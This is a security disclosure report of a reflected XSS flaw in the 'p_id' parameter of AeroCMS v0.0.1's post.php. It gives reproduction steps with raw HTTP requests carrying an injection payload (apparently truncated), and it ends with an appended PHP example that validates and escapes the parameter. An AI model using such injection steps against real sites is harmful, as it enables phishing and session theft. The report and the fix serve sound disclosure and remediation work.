AeroCMS
Reflected XSS Vulnerability on AeroCMS v0.0.1
Description: I found a cross-site scripting (XSS) vulnerability in the "p_id" parameter of your AeroCMS (v0.0.1) post.php page. When I use malicious code or any XSS payload, the browser gives me the result, because a browser cannot know whether the script should be trusted or not.
CMS Version: v0.0.1
Affected URL: http://127.0.0.1/AeroCMS/post.php
Steps to Reproduce:
- First, open http://127.0.0.1/AeroCMS/
- Then click the "Read More" button on a post.
- Then your request data will be
    GET /AeroCMS/post.php?p_id=1 HTTP/1.1
    Host: 127.0.0.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/110.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Cookie: PHPSESSID=qtj8dhp0jub18i2agkfm4bf5ea
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Connection: close
- The "p_id" parameter is vulnerable. Let's try to use the XSS payload "> or any XSS payload in the "p_id" parameter, and your request data will be
    GET /AeroCMS/post.php?p_id=1"> HTTP/1.1
    Host: 127.0.0.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/110.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Cookie: PHPSESSID=qtj8dhp0jub18i2agkfm4bf5ea
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Connection: close
- Catch!! You will see an XSS popup.
Proof of Concept: You can see the Proof of Concept; I've attached screenshots to confirm the vulnerability.
Impact: Attackers can make use of this to conduct attacks like phishing, stealing sessions, etc.
Let me know if any further info is required.
Thanks & Regards
Rahad Chowdhury
Cyber Security Specialist
https://www.linkedin.com/in/rahadchowdhury/
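
Added example, not part of the original report and not AeroCMS's own code: one way to handle `p_id` so that a value such as `1">` from the request above is rejected before it reaches the page, and anything that is echoed is HTML-escaped. The function names and the rendered link fragment are hypothetical, because the report does not show the post.php source or where the parameter is reflected.

```php
<?php
declare(strict_types=1);

// Hypothetical helpers: the report does not show AeroCMS's post.php source.

/** Return p_id as a positive integer, or null for anything else. */
function parse_post_id(mixed $raw): ?int
{
    if (!is_string($raw)) {
        return null; // missing parameter, or an array such as p_id[]=1
    }
    $id = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $id === false ? null : $id;
}

/** Escape a value for HTML text and quoted-attribute contexts. */
function h(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

/** Build the fragment that reflects the id (assumed reflection point). */
function render_post_link(?int $id): string
{
    if ($id === null) {
        return '<p>Invalid post id.</p>'; // never echo the rejected value
    }
    $safe = h((string) $id); // already an int; escaped as defence in depth
    return '<a href="post.php?p_id=' . $safe . '">Post ' . $safe . '</a>';
}

// In post.php this would be: $id = parse_post_id($_GET['p_id'] ?? null);
// followed by an HTTP 400 response when $id is null.
// Constructed sample inputs, including the value from the request above.
foreach (['1', '1">', 'abc'] as $raw) {
    printf("%-6s => %s\n", var_export($raw, true), render_post_link(parse_post_id($raw)));
}
```

Only the first input produces a link; the other two fall through to the fixed error fragment, so no request-supplied characters appear in the response.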